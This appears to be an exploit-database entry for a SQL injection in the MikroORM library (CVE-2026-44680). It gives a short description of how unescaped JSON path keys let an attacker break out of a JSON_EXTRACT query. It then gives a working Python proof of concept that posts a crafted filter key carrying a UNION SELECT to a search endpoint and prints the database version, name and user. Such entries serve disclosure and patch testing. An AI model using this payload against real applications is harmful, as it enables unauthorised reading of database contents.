# Exploit Title: MikroORM   7.0.13 - SQL Injection 
# Google Dork: N/A
# Date: 2026-05-27
# Exploit Author: cardosource
# Vendor Homepage: https://mikro-orm.io/
# Software Link: https://github.com/mikro-orm/mikro-orm
# Version: @mikro-orm/knex <= 6.6.13 / @mikro-orm/sql <= 7.0.13
# Tested on: Docker / Debian Bookworm / Node.js 18 / MariaDB 10.x
# CVE: CVE-2026-44680
# Advisory: https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-cfw5-68c4-ffqp

"""
Description:
The vulnerability exists because MikroORM fails to properly escape
runtime-controlled JSON path keys when building JSON_EXTRACT queries.

The attacker can break out of the JSON path context and inject arbitrary SQL.

Affected API pattern:

em.find(Entity, {
    jsonColumn: {
        [userControlledKey]: value
    }
})


By injecting crafted JSON-path keys, it becomes possible to execute
UNION SELECT statements and extract arbitrary database information.
"""

import requests
import json

url = "http://localhost:3000/api/users/search"

payload = {
    "filterField": "$.x' ) OR 1=1 UNION SELECT @@version, DATABASE(), USER(), @@version_comment -- ",
    "filterValue": "x"
}

headers = {
    "Content-Type": "application/json"
}

response = requests.post(url, json=payload, headers=headers)

print(f"Status: {response.status_code}")
print(json.dumps(response.json(), indent=2))